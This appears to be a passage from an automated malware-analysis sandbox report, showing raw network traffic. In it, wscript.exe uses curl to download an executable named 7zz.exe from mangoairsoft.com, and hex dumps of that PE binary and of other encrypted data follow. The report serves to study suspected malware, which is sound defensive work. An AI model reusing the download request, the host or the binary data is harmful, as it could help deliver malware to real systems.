                                                          Data Ascii: **)*SOY@sm]44HMB<N0i#x,,,-$(!H%~o[)c@oEP 11!bE8f({;QLISWYQ$mQ0H`[diAgQIC$('-3z"(zo:&@ZR@6%!X)a
                                                          2023-08-02 08:16:22 UTC2895INData Raw: eb 44 ac 41 e2 ee c9 0b c8 4c 0e fe 51 11 2f 67 73 16 41 11 78 bb 39 1c e6 4a fc 12 55 3d e5 2d 3b c6 68 cd a9 bc f0 8a 66 df 4b fe 74 51 00 af de e9 11 49 e0 5b 6d b6 6a fc cd 02 c4 c9 53 0a ca 3d df 42 cd 1b 02 44 88 8d 17 c5 c8 25 5b 1d 40 bc 40 f2 39 f6 e4 41 a4 c6 3e e4 bf 88 b9 5c 1b f6 10 e0 17 5f d2 fe 8a f0 b5 51 9e d6 61 b0 46 50 4c 54 64 45 5a d9 a6 3c c7 ed f9 08 08 02 bf b9 f6 d7 49 47 53 96 97 08 ec 33 3b 48 ca 7b 63 e7 64 b0 e2 8d 41 c8 f8 e4 a2 4e 2b 45 c2 eb 54 23 71 57 8e ec b6 f6 b9 12 b1 4f 43 1a 9a 05 68 6b 35 4e e0 32 57 6b 66 5b e4 b6 ef ee 2b 71 66 d2 6f 53 ba 44 f0 b5 04 37 a7 3c 01 36 c4 be 95 0c be 29 c9 33 22 9b de d2 27 68 c6 4b 9d 2d 04 2c f0 06 79 89 c4 0b 93 7c 66 b4 f0 37 2e f9 fc 92 39 dc f6 bc ad 67 b5 ef 0f 82 89 ec 27
                                                          Data Ascii: DALQ/gsAx9JU=-;hfKtQI[mjS=BD%[@@9A>\_QaFPLTdEZ<IGS3;H{cdAN+ET#qWOChk5N2Wkf[+qfoSD7<6)3"'hK-,y|f7.9g'
                                                          2023-08-02 08:16:22 UTC2911INData Raw: 84 05 29 13 be 99 1b 14 d7 69 be 54 dc 18 1e eb d6 c9 0b 09 e4 b2 a7 f2 c1 1a ba 27 b9 98 05 c4 1c 54 a9 06 77 c0 12 38 83 74 af 10 a3 37 29 d2 4c e4 16 e8 d4 87 6a 8b 71 c0 15 28 db 8f 7f 95 cd 58 c0 92 d1 f9 cc 81 b0 8d c2 d6 f9 62 3e 76 ce 07 ee 3b a6 4c 0a 81 c5 1a a3 f3 eb 1e 6f c3 9e d6 4a d2 04 ec 22 cd 6b 38 d5 8b e8 5f bf 52 26 1e 8e f9 8a bc 62 bb b3 a9 5c dd 66 ac d1 fb b0 7d 61 90 16 aa 04 4f 33 ad 0c 5a 51 db 3b 83 ef 93 fa 3d 2b fc ed f6 00 02 79 c8 dc 05 e9 42 4e 53 68 5c c5 3d d8 49 ad 39 46 8a 57 ad 6e f6 db b3 8a fc 7b e4 4c 04 c2 07 d6 4b 86 73 ac 58 5a 02 7e bd 9e b4 20 3c ef d1 22 6b fa 80 7e 95 38 39 69 8f d0 8c 95 ac b5 fe 89 8e cc 63 ff 53 cf 6a eb 51 ce db 17 a4 4e 1a cc 2f 08 7b 08 7c 6a 30 a2 e7 f0 5b 99 7d 07 de 5e 55 76 60 de
                                                          Data Ascii: )iT'Tw8t7)Ljq(Xb>v;LoJ"k8_R&b\f}aO3ZQ;=+yBNSh\=I9FWn{LKsXZ~ <"k~89icSjQN/{|j0[}^Uv`
                                                          2023-08-02 08:16:22 UTC2927INData Raw: 45 08 12 62 eb 8e bf af 0e 6b 1e 55 b8 cd 93 14 70 bf 39 3e 86 4e 39 43 13 0b de 13 60 27 22 32 f2 51 74 e9 e1 e3 29 87 a7 29 03 00 64 39 3a 31 93 49 a5 ba 39 99 83 e5 18 2f c7 de e1 bd 1b f2 86 b8 6a ae ec 39 f7 04 79 61 e4 cf 3c d9 39 ee 29 81 cc ac 8f ca 1b de 91 3d f5 13 5f 04 f6 c6 21 54 f5 6d d7 63 c1 2a 47 ee d0 6a 2b 1a ed 08 a9 dc 0a 71 36 9c 57 57 7b ec 91 1a 04 e6 bd f8 fd 05 32 48 dd 20 4b 7e ae d7 fa 6c 45 f5 6b 0a 99 3a a4 57 55 42 5c c6 f5 0c 3e 11 27 d5 3b 6e 8c 94 f5 f2 f8 b5 fa 79 fb e9 26 ec 55 3a 17 93 a6 9c c9 31 82 23 4f 12 7b 31 e9 92 ac 4b 72 90 c8 ea 77 bf d1 94 9a 44 79 62 ea cd 60 90 cc 85 89 99 34 5f 7d 28 4d e0 fe e1 0a 9d a8 84 d6 56 3b d7 28 e9 44 d3 52 64 b5 67 7e 9d 56 98 b9 b0 cd 07 81 a8 3b bc 6a d1 b0 10 26 bd 43 56 04
                                                          Data Ascii: EbkUp9>N9C`'"2Qt))d9:1I9/j9ya<9)=_!Tmc*Gj+q6WW{2H K~lEk:WUB\>';ny&U:1#O{1KrwDyb`4_}(MV;(DRdg~V;j&CV
                                                          2023-08-02 08:16:22 UTC2943INData Raw: 7c 29 7e dc ed 17 ed de e7 03 19 45 71 f5 b9 de 00 a7 6f 4a 3d d0 09 65 36 a4 64 59 bd d9 59 29 29 29 ea e6 ef 8b e5 ca 49 49 49 dd 19 f6 6c 33 5b 10 c4 69 87 24 25 1a 8d c8 32 4b e5 35 0a 95 1c f7 16 09 93 25 69 43 2b 41 36 84 63 d9 1c f7 d4 21 ea 81 e0 c2 39 85 55 6f 63 f1 e3 bf 50 20 4a 7d e9 9a 2d a4 9b be 57 dd 56 66 b7 ba 07 2d 3d 01 99 08 70 c7 e4 01 6a 39 b6 c2 e1 d2 23 50 df 31 95 3b 43 41 41 72 55 20 03 5b f8 e1 79 5b 40 8d 8a 98 6c 0a 29 a2 2b ba 47 0b 4e 92 b6 26 e3 6c cb 6a bf c8 92 a5 1f 42 b3 54 30 8a a1 7d 88 07 98 08 86 a5 ef 44 b3 09 71 06 52 8a 05 b5 b8 f6 62 f1 74 42 f4 fc ce bf 94 2e 10 3e 05 44 14 fc d2 86 8c 0d 8d 49 20 e4 12 c8 b1 ad 48 e0 89 e2 82 84 75 27 dd 8e 4d 28 9c e4 d9 bd 05 b7 b3 43 56 9f a6 7c ac a6 f4 6c df 02 08 b9 2d
                                                          Data Ascii: |)~EqoJ=e6dYY)))IIIl3[i$%2K5%iC+A6c!9UocP J}-WVf-=pj9#P1;CAArU [y[@l)+GN&ljBT0}DqRbtB.>DI Hu'M(CV|l-
                                                          2023-08-02 08:16:22 UTC2959INData Raw: ff 7b 25 45 72 1b a5 70 cc 12 5c 70 67 60 1a 1e a2 04 cf 1e 93 cf cc 9d 44 ad 4d 6a bf 47 5c ff 20 b1 c6 63 3e 47 8c d5 2a af 9f b2 4d 1f 67 97 27 f8 51 3f db 7d 7b 72 33 e8 83 62 97 ce 0c 07 65 6e c5 ba a4 e1 8c 9f a1 8c 2d 53 01 e4 12 15 5c 19 af 17 d6 2f 4e 4f 8c 82 72 e2 4e 7c 1e b9 84 f7 09 07 4e 60 a3 98 4a 73 77 24 53 9d fc ba f5 90 1e 9c 39 e7 0c 05 b2 fa 67 96 d1 14 79 1d cf d0 94 d4 bd ee b3 fc 07 ad fc 4d 8d 9d 38 34 bc 43 ad 74 31 4e 76 08 5e 94 8a e1 de 0a 47 74 51 4a f3 7e 4a f4 77 40 93 06 9e c2 37 c7 f0 2c ec a2 a3 ca b4 ac c7 64 95 70 62 4f 9c 58 3c 47 5c 27 73 ed b2 7f 39 79 1b 47 e8 b0 2b bf 80 34 db 11 a4 18 0d c6 ac a7 7a 04 cc eb c0 78 01 91 5b bc 68 54 82 cc 7e 56 d7 f3 53 e5 1d a6 4d 87 2e 62 29 4a 12 c8 ca aa 7a 9b 13 dd 19 5b 85
                                                          Data Ascii: {%Erp\pg`DMjG\ c>G*Mg'Q?}{r3ben-S\/NOrN|N`Jsw$S9gyM84Ct1Nv^GtQJ~Jw@7,dpbOX<G\'s9yG+4zx[hT~VSM.b)Jz[
                                                          2023-08-02 08:16:22 UTC2975INData Raw: c6 ce f7 a9 f2 5c b5 5d 5c ae 47 e8 0c 68 0e cc ea c9 38 fa b5 52 54 50 c6 90 c6 7a 2d 6f a1 d5 55 99 88 88 16 8d e3 b1 ae dc c1 15 ed bf ad 12 1d 94 3e c3 a9 7f a2 25 bf d7 86 99 d8 a0 bb 99 20 38 b5 b0 d4 7c f8 59 65 88 20 08 8e 7a 54 de 0f 0f db cb 12 9d 3a ee e3 f0 5f 9d bf 66 db e6 fd ad 29 ed 5b 4d db 65 c9 46 5d 03 d2 30 2f 5e 46 25 0f c6 ff c1 79 53 22 25 20 b5 b9 50 fe bb 4e 1f cd 4d 2a 5b 68 39 d6 42 70 68 a0 1f 35 78 d1 87 6b d9 ab 6b 8f 19 c5 fe 1c aa c4 1d c6 0d ae 51 d2 60 f7 ac 48 f6 cd a9 56 16 37 37 f7 36 f5 8d b6 3e f7 61 19 a8 0f 37 01 8d 51 92 82 b4 c9 51 fd f7 21 8c eb d7 aa aa 4a bb f1 ba 51 64 4f 68 40 01 ee c6 c3 e8 ba d5 2b 07 56 4f 84 3a b5 38 cc 82 b6 48 82 00 82 8c 38 d9 b9 b1 36 ac 82 ed 66 45 f0 1f db 90 cb d6 db 00 8f c8 b3
                                                          Data Ascii: \]\Gh8RTPz-oU>% 8|Ye zT:_f)[MeF]0/^F%yS"% PNM*[h9Bph5xkkQ`HV776>a7QQ!JQdOh@+VO:8H86fE
                                                          2023-08-02 08:16:22 UTC2991INData Raw: 01 79 e4 71 bc 69 b4 8f 13 66 2e 37 6b f9 b7 bf 9b 02 0d 7f 5c fc 34 5e bc 88 68 7b 31 70 66 77 7a 33 7c a7 b1 93 a4 e4 1b bb ae 71 ce 8b f3 5a 66 99 2c 7a 28 7d 04 4c 96 c4 e4 72 17 5d 2d a7 72 e8 7b 61 d8 0b d8 c9 42 f7 69 26 46 a6 13 e4 34 41 e1 32 07 c0 33 00 e4 81 c9 c3 10 8e 81 2f 15 7c 6c 42 c7 26 1c 12 70 08 c7 23 04 87 10 1c 61 f2 13 38 cb 83 f7 85 8b da ca 7d ba 5b 83 2c 31 a3 76 7e d2 2f cb 59 74 92 dc 5f f1 b7 3b 71 3b 4d 8d d3 5e c3 08 1b f2 e0 18 dc 04 ca 4f f0 89 0b 69 fa d4 fe 52 5f 46 bf fd 95 1c ad 90 9d 55 a5 3b 75 ec 40 49 50 9a 76 5d 62 0c 18 03 b6 e4 32 60 3b 70 19 03 e1 92 84 5c ce a3 6b e5 02 8e c0 30 38 82 41 1c 17 4e 2d a2 70 84 ae 3a 99 7c 80 b1 a3 24 e5 b8 ba d7 93 c2 94 6e 30 18 5c 83 dc 87 ca 19 95 f2 70 e5 c1 70 86 60 38 87
                                                          Data Ascii: yqif.7k\4^h{1pfwz3|qZf,z(}Lr]-r{aBi&F4A23/|lB&p#a8}[,1v~/Yt_;q;M^OiR_FU;u@IPv]b2`;p\k08AN-p:|$n0\pp`8
                                                          2023-08-02 08:16:22 UTC3007INData Raw: 60 20 5c 3c 64 2a ab 3e 71 69 91 b5 e9 09 d4 ea fa 90 e0 e7 43 45 de ec 3f 6d 0f 5d 3f 29 7a cf 57 1d a6 95 99 1c 66 0a 57 f3 6c a7 f7 d9 7e 20 c7 e7 39 68 b2 07 78 9b ef df 67 91 91 cc bb 5e 12 ff f3 64 19 2d ce b5 1d 26 fb 9b f2 5c 1f 5a 68 af 8f e5 7a 47 4e 0b b3 56 e6 57 d6 3c 9d 92 9b e6 84 3e 14 e7 3b ee e3 fd 2b 99 ee cd 57 af 56 6a 22 55 4a 28 da 55 02 f3 0c a9 75 3c b2 46 8d bf 45 86 25 f2 37 19 60 06 32 b7 80 cc 04 aa 35 20 38 04 b5 bc cc f3 22 36 e0 7f 7f ee 33 92 0d 0f ca 11 e3 a1 a6 fd 5c 3e 3f 70 1f 5f 1d cd a4 f2 41 48 07 4a 4f c2 05 0b 51 6e 16 64 4c 12 54 ec 7c 3d b3 09 e8 18 4b 55 a3 89 25 82 d7 eb 0b a9 41 cd 7d 65 39 8d 95 49 29 59 bd 2f 08 33 b0 c1 ba 35 59 a7 5c bd 9e f7 b4 26 8e 02 35 b2 17 d6 ca ce 56 5c ca a1 1a a5 98 90 d2 ef e3
                                                          Data Ascii: ` \<d*>qiCE?m]?)zWfWl~ 9hxg^d-&\ZhzGNVW<>;+WVj"UJ(Uu<FE%7`25 8"63\>?p_AHJOQndLT|=KU%A}e9I)Y/35Y\&5V\
                                                          2023-08-02 08:16:22 UTC3023INData Raw: da e3 50 bb df 8f 07 22 f2 0f 21 ed 0d bd 46 f2 7b 16 02 ee df ad 09 94 a3 93 b1 9b 6b d9 e3 2c a7 9b de 8a ba 2f 22 6f 2a 99 7d ef 2c 4f 46 d3 ac 0c 6e 3c bc be b1 ad 44 95 56 4b f6 4b 0c 31 3c 00 26 a1 f2 7b dd f0 2c 52 5d ba 92 02 7e d6 fb 94 2b 54 b7 cd 0a 4c d0 96 24 40 a9 7f 81 0f a2 4b 7b b0 ec 93 f2 b3 a7 83 e4 d1 d7 43 72 66 42 1d 2b a5 df a0 ff df c0 10 2b 02 64 d0 a3 bb ca fa 4f 7e 6b eb 3e 2d 06 e2 b3 73 fc fa 57 cd 20 cd 48 7a 42 72 ad fd 3b bd 1f d6 90 21 4a 0a ec 32 13 eb eb 0d 0d cb 66 b5 79 29 0c ce 95 b4 29 a1 00 c6 ed 8f 7c 7e 20 e4 9b 5a 0c cd 6b c4 cb 57 8c 6f 76 9a 4a 80 37 4c 3c 95 54 b4 f7 d5 00 d4 07 3c 90 72 34 b5 8d bc 30 7a fb 25 29 db 46 e2 69 fa c3 a6 a9 62 39 06 2a d8 b7 96 3b 92 e0 c4 fb 85 b7 b7 a4 4d 33 1d e6 2f 89 bf de
                                                          Data Ascii: P"!F{k,/"o*},OFn<DVKK1<&{,R]~+TL$@K{CrfB++dO~k>-sW HzBr;!J2fy))|~ ZkWovJ7L<T<r40z%)Fib9*;M3/


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.649708188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2023-08-02 08:16:23 UTC3036OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1
                                                          Host: mangoairsoft.com
                                                          User-Agent: curl/7.55.1
                                                          Accept: */*
                                                          2023-08-02 08:16:23 UTC3037INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 02 Aug 2023 08:16:23 GMT
                                                          Content-Type: application/x-msdos-program
                                                          Content-Length: 587776
                                                          Connection: close
                                                          Last-Modified: Tue, 25 Jul 2023 11:24:55 GMT
                                                          ETag: "8f800-6014dfb053871"
                                                          Accept-Ranges: bytes
                                                          2023-08-02 08:16:23 UTC3037INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d 11 72 52 39 70 1c 01 39 70 1c 01 39 70 1c 01 42 6c 10 01 3b 70 1c 01 ba 6c 12 01 20 70 1c 01 0f 56 16 01 5b 70 1c 01 b7 78 43 01 38 70 1c 01 39 70 1d 01 96 70 1c 01 ba 78 41 01 3e 70 1c 01 0f 56 17 01 84 70 1c 01 56 06 b6 01 19 70 1c 01 56 06 82 01 3b 70 1c 01 fe 76 1a 01 38 70 1c 01 52 69 63 68 39 70 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}rR9p9p9pBl;pl pV[pxC8p9ppxA>pVpVpV;pv8pRich9pPEL
                                                          2023-08-02 08:16:23 UTC3053INData Raw: 3b 00 00 f6 44 24 08 01 74 07 56 e8 16 2f 00 00 59 8b c6 5e c2 04 00 b8 9c 30 47 00 e8 7d 6d 06 00 83 ec 10 53 56 57 8b f9 33 f6 8b da 6a 03 8d 4d e4 89 75 f0 89 75 e4 89 75 e8 89 75 ec e8 65 d3 ff ff 8d 55 e4 8b cb 89 75 fc e8 a5 4b 00 00 8d 45 e4 8b cf 50 e8 73 ee ff ff ff 75 e4 e8 c3 2e 00 00 59 8b c7 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 53 56 8b f1 33 db 6a 03 8d 4e 10 88 1e 88 5e 01 88 5e 02 88 5e 03 88 5e 04 89 5e 08 89 5e 0c 89 19 89 59 04 89 59 08 e8 07 d3 ff ff 89 5e 20 89 5e 24 89 5e 28 c7 46 2c 04 00 00 00 c7 46 1c 78 a6 47 00 8b c6 5e 5b c3 b8 be 30 47 00 e8 d7 6c 06 00 51 56 8b f1 57 33 ff 8d 4e 04 89 3e 6a 03 89 75 f0 89 39 89 79 04 89 79 08 e8 c3 d2 ff ff 8d 4e 10 6a 03 89 7d fc 89 39 89 79 04 89 79 08 e8 ae d2 ff ff 8d 4e 1c 6a 03
                                                          Data Ascii: ;D$tV/Y^0G}mSVW3jMuuuueUuKEPsu.YM_^[dSV3jN^^^^^^YY^ ^$^(F,FxG^[0GlQVW3N>ju9yyNj}9yyNj
                                                          2023-08-02 08:16:23 UTC3069INData Raw: d8 c1 e3 02 8b 45 08 8b 40 0c 8b 14 18 8b 46 0c 8b 0c b8 e8 94 fe ff ff 84 c0 74 09 47 83 c3 04 3b 7e 08 7c df 8b 56 08 3b fa 74 15 8b 45 0c 40 3b 45 fc 89 45 0c 7e c1 32 c0 5f 5e 5b c9 c2 08 00 b0 01 eb f5 56 57 8b f1 33 ff 39 7e 18 7e 1c 8b 46 1c 8b 54 24 0c 8b 04 b8 8d 48 04 e8 c8 fc ff ff 85 c0 74 0e 47 3b 7e 18 7c e4 83 c8 ff 5f 5e c2 04 00 8b c7 eb f7 80 7c 24 04 00 ff 74 24 08 74 05 83 c1 24 eb 03 83 c1 38 e8 48 08 00 00 c2 08 00 b8 5c 38 47 00 e8 01 2d 06 00 83 ec 4c 53 56 57 8b 7d 0c 8b f1 8b 47 08 83 f8 01 7e 5f 8b 47 0c 8b 18 8b cb 89 5d 0c e8 8a fe ff ff 84 c0 75 4c 53 8b ce e8 7a ff ff ff 8b d8 85 db 7d 27 56 8d 4d a8 ff 75 0c e8 4e 00 00 00 83 65 fc 00 50 8d 4e 10 e8 6e 07 00 00 83 4d fc ff 8d 4d a8 8b d8 e8 90 cc ff ff 8b 07 6a 01 6a 00 8b
                                                          Data Ascii: E@FtG;~|V;tE@;EE~2_^[VW39~~FT$HtG;~|_^|$t$t$8H\8G-LSVW}G~_G]uLSz}'VMuNePNnMMjj
                                                          2023-08-02 08:16:23 UTC3085INData Raw: 57 e8 14 30 00 00 85 c0 89 46 08 74 08 33 c0 eb 0d 83 66 08 00 01 7e 10 8b c7 83 56 14 00 5f 5e c2 04 00 83 e9 00 74 2c 49 74 25 49 74 1c 83 e9 03 74 11 83 e9 05 74 06 b8 05 40 00 80 c3 b8 04 40 00 80 c3 b8 57 00 07 80 c3 b8 0e 00 07 80 c3 6a 01 58 c3 33 c0 c3 8b c1 8b 4c 24 04 83 60 0c 00 89 48 08 c7 00 66 cb 40 00 c7 40 04 ac cb 40 00 c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b f1 b8 00 00 00 80 8b 0f 3b c8 89 4d 08 72 03 89 45 08 8b 46 08 8d 5d 08 53 ff 75 08 8b 08 52 50 ff 51 0c 89 46 0c 8b 45 08 89 07 8b 46 0c f7 d8 1b c0 5f 5e 83 e0 08 5b 5d c2 04 00 55 8b ec 51 51 8b 45 08 56 57 8b f9 33 c9 8b f2 2b c1 74 12 48 74 0c 48 74 05 6a 05 58 eb 34 6a 02 eb 02 6a 01 59 53 8b 47 08 8d 5d f8 8b 10 53 51 ff 76 04 ff 36 50 ff 52 10 89 47 0c 8b 45 f8 89 06 8b 45 fc
                                                          Data Ascii: W0Ft3f~V_^t,It%Ittt@@WjX3L$`Hf@@@USVW};MrEF]SuRPQFEF_^[]UQQEVW3+tHtHtjX4jjYSG]SQv6PRGEE
                                                          2023-08-02 08:16:23 UTC3101INData Raw: ff 75 fc 8b cf 56 ff 75 08 e8 8d 84 ff ff 5f 5e c9 c2 08 00 b8 ac 41 47 00 e8 80 ad 05 00 83 ec 1c 53 56 57 8b 7d 08 8b d9 6a 01 8b 47 08 89 55 f0 3b c3 5e 75 34 80 7d 10 00 75 2e ff 35 18 ba 48 00 8d 4d e4 e8 f6 29 ff ff ff 75 0c 8b 4d f0 83 65 fc 00 8d 55 e4 56 e8 7a ff ff ff 83 4d fc ff ff 75 e4 e8 bd 6e ff ff 59 3b 5f 08 7d 6a 8b 47 0c 8b 0c 98 83 79 04 00 74 48 8b 01 66 83 38 40 75 2f 8d 45 d8 56 50 e8 4a 67 ff ff ff 75 14 8b 00 8b 4d f0 8b d0 ff 75 0c 89 75 fc 56 e8 47 00 00 00 83 4d fc ff ff 75 d8 e8 77 6e ff ff 59 eb 0e ff 75 0c 8b d1 8b 4d f0 56 e8 17 ff ff ff 43 eb a7 a1 38 ba 48 00 68 58 d3 47 00 89 45 10 8d 45 10 50 e8 29 ad 05 00 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 b8 c8 41 47 00 e8 aa ac 05 00 83 ec 18 53 56 57 33 f6 bf 20 a4
                                                          Data Ascii: uVu_^AGSVW}jGU;^u4}u.5HM)uMeUVzMunY;_}jGytHf8@u/EVPJguMuuVGMuwnYuMVC8HhXGEEP)M_^[dAGSVW3
                                                          2023-08-02 08:16:23 UTC3117INData Raw: 00 60 00 8b c3 8b de 8b f2 55 99 6a 03 03 d8 55 57 13 f2 e8 66 68 05 00 6a 01 59 e8 ce 67 05 00 03 d8 13 f2 5f 8b d6 5e 8b c3 5d 5b 59 c3 53 8a 5c 24 08 56 8b f1 f6 c3 02 74 24 57 8d 7e fc 68 b4 29 44 00 ff 37 6a 18 56 e8 27 73 05 00 f6 c3 01 74 07 57 e8 cd 2e ff ff 59 8b c7 5f eb 15 8b ce e8 5c de 02 00 f6 c3 01 74 07 56 e8 b5 2e ff ff 59 8b c6 5e 5b c2 04 00 b8 80 47 47 00 e8 1b 6d 05 00 83 ec 1c 53 33 db 56 57 89 5d e0 c7 45 d8 cc aa 47 00 68 00 05 00 00 8d 4d d8 89 5d fc e8 88 f0 ff ff 84 c0 0f 84 80 00 00 00 8b 75 e0 33 c0 ba 00 01 00 00 88 04 30 40 3b c2 72 f8 8b ce e8 8b 00 00 00 3d 73 8c 05 29 75 60 8d 45 e4 ba 00 04 00 00 50 8d 8e 00 01 00 00 c7 45 e4 e5 55 9a 15 c7 45 e8 b5 3b 12 1f e8 93 00 00 00 89 5d ec 8b 45 ec 83 65 f0 00 8d 3c 30 8b 55 f0
                                                          Data Ascii: `UjUWfhjYg_^][YS\$Vt$W~h)D7jV'stW.Y_\tV.Y^[GGmS3VW]EGhM]u30@;r=s)u`EPEUE;]Ee<0U
                                                          2023-08-02 08:16:23 UTC3133INData Raw: ff 75 d0 8b f0 e8 1c ef fe ff ff 75 dc e8 14 ef fe ff ff 75 c4 e8 0c ef fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b c6 e9 65 01 00 00 ff 75 1c 8d 45 b8 8d 4d c4 50 e8 63 e8 fe ff 50 8d 4d dc c6 45 fc 05 e8 e3 92 fe ff ff 75 b8 c6 45 fc 04 e8 c9 ee fe ff 59 8d 45 b8 ff 75 1c 8d 4d c4 50 e8 6a e7 fe ff 50 8d 4d d0 c6 45 fc 06 e8 ba 92 fe ff ff 75 b8 c6 45 fc 04 e8 a0 ee fe ff 59 8d 45 d0 50 8d 45 dc 50 8b ce e8 a5 02 00 00 eb 10 8b 45 18 8b 56 08 8b 08 8d 46 08 51 50 ff 52 0c ff 75 f0 8b cf ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a1 f9 ff ff 3b c3 89 45 18 74 34 ff 75 d0 e8 56 ee fe ff ff 75 dc e8 4e ee fe ff ff 75 c4 e8 46 ee fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b 45 18 e9 9e 00 00 00 8d 45 d0
                                                          Data Ascii: uuuEM;tPQeuEMPcPMEuEYEuMPjPMEuEYEPEPEVFQPRuuuuuu;Et4uVuNuFEM;tPQEE
                                                          2023-08-02 08:16:23 UTC3149INData Raw: 74 07 8b 10 51 8b c8 ff 12 ff 45 f8 83 45 fc 0c 8b 45 f8 3b 43 08 0f 8c 77 ff ff ff 8b 4d 08 e8 1a bc fe ff 5f 5e 5b c9 c2 08 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 f0 8d 45 f0 50 e8 c1 ed 04 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 ec 8d 45 ec 50 e8 ab ed 04 00 8b 44 24 08 83 f8 01 72 07 b8 57 00 07 80 eb 2b 8b 54 24 10 8d 04 40 8b 0c 85 1c c4 48 00 8d 04 85 18 c4 48 00 89 0a 8b 4c 24 14 66 8b 40 08 66 89 01 8b 44 24 0c 83 20 00 33 c0 c2 14 00 b8 28 56 47 00 e8 ff ec 04 00 83 ec 10 33 c9 66 89 4d e4 66 89 4d e6 83 7d 0c 2c 89 4d fc 75 16 8b 45 08 38 48 30 74 0e ff 70 24 8d 4d e4 ff 70 20 e8 03 f6 fe ff ff 75 10 8d 4d e4 e8 ea f6 fe ff 83 4d fc ff 8d 4d e4 e8 3b f6 fe ff 8b 4d f4 33 c0 64 89 0d 00 00 00 00 c9 c2 0c 00 b8 3c 56 47 00 e8 a2 ec 04 00 83 ec 10
                                                          Data Ascii: tQEEE;CwM_^[HhXGEEPHhXGEEPD$rW+T$@HHL$f@fD$ 3(VG3fMfM},MuE8H0tp$Mp uMMM;M3d<VG
                                                          2023-08-02 08:16:23 UTC3165INData Raw: eb 12 48 48 e9 9d f8 ff ff b8 01 0b 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 b8 4c 5c 47 00 e8 6f ad 04 00 83 ec 34 53 56 8b f1 57 33 db 6a 03 8d 4d e4 89 5d f0 89 5d e4 89 5d e8 89 5d ec e8 59 13 fe ff 38 5e 18 8b 7e 10 89 5d fc 0f 84 4b 01 00 00 89 7d f0 4f 3b fb 7c 66 8b 46 0c 66 8b 1c 78 66 83 fb 7a 75 26 8d 45 e4 66 ba 61 00 50 8d 4d d8 e8 de 0b 00 00 50 8d 4d e4 c6 45 fc 01 e8 a4 12 fe ff 80 65 fc 00 ff 75 d8 eb 2a 66 83 fb 5a 75 63 8d 45 e4 66 ba 41 00 50 8d 4d cc e8 b2 0b 00 00 50 8d 4d e4 c6 45 fc 02 e8 78 12 fe ff 80 65 fc 00 ff 75 cc e8 5e 6e fe ff 4f 59 79 9a 8d 7e 0c 8d 45 e4 50 8b cf e8 5a 12 fe ff 8b 4d 08 57 8b d6 e8 c9 a4 fe ff ff 75 e4 e8 39 6e fe ff 8b 45 08 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9
                                                          Data Ascii: HHBM_^d[L\Go4SVW3jM]]]]Y8^~]K}O;|fFfxfzu&EfaPMPMEeu*fZucEfAPMPMExeu^nOYy~EPZMWu9nEYM_^[d
                                                          2023-08-02 08:16:23 UTC3181INData Raw: 00 a1 8c c9 48 00 a3 cc 0c 49 00 c3 8b 15 8c c9 48 00 56 8d 71 14 8b ce e8 1e 00 00 00 84 c0 75 15 8b 15 90 c9 48 00 8b ce e8 0d 00 00 00 84 c0 75 04 33 c0 5e c3 6a 01 58 5e c3 8b 09 e8 46 35 fe ff f7 d8 1b c0 40 c3 b8 80 64 47 00 e8 4c 6d 04 00 83 ec 24 53 56 8b 71 3c 57 8b 7d 08 83 7f 18 00 75 0e ff 35 cc 0c 49 00 8d 4f 14 e8 2f ea fd ff 8b cf e8 93 ff ff ff 84 c0 0f 84 42 01 00 00 83 fe 09 72 07 b8 00 00 00 04 eb 27 83 fe 07 72 07 b8 00 00 00 02 eb 1b 83 fe 05 72 07 b8 00 00 00 01 eb 0f 83 fe 03 1b c0 25 00 00 f1 ff 05 00 00 10 00 83 fe 05 8b 0d a8 c9 48 00 1b db 43 83 fe 07 1b ff 83 e7 e0 83 c7 40 83 fe 05 73 06 8b 0d a4 c9 48 00 66 83 65 e2 00 89 4d f0 66 c7 45 e0 13 00 89 45 e8 8b 4d 08 83 65 fc 00 8d 45 e0 50 6a 01 5a e8 69 03 00 00 83 ce ff 8d 4d
                                                          Data Ascii: HIHVquHu3^jX^F5@dGLm$SVq<W}u5IO/Br'rr%HC@sHfeMfEEMeEPjZiM
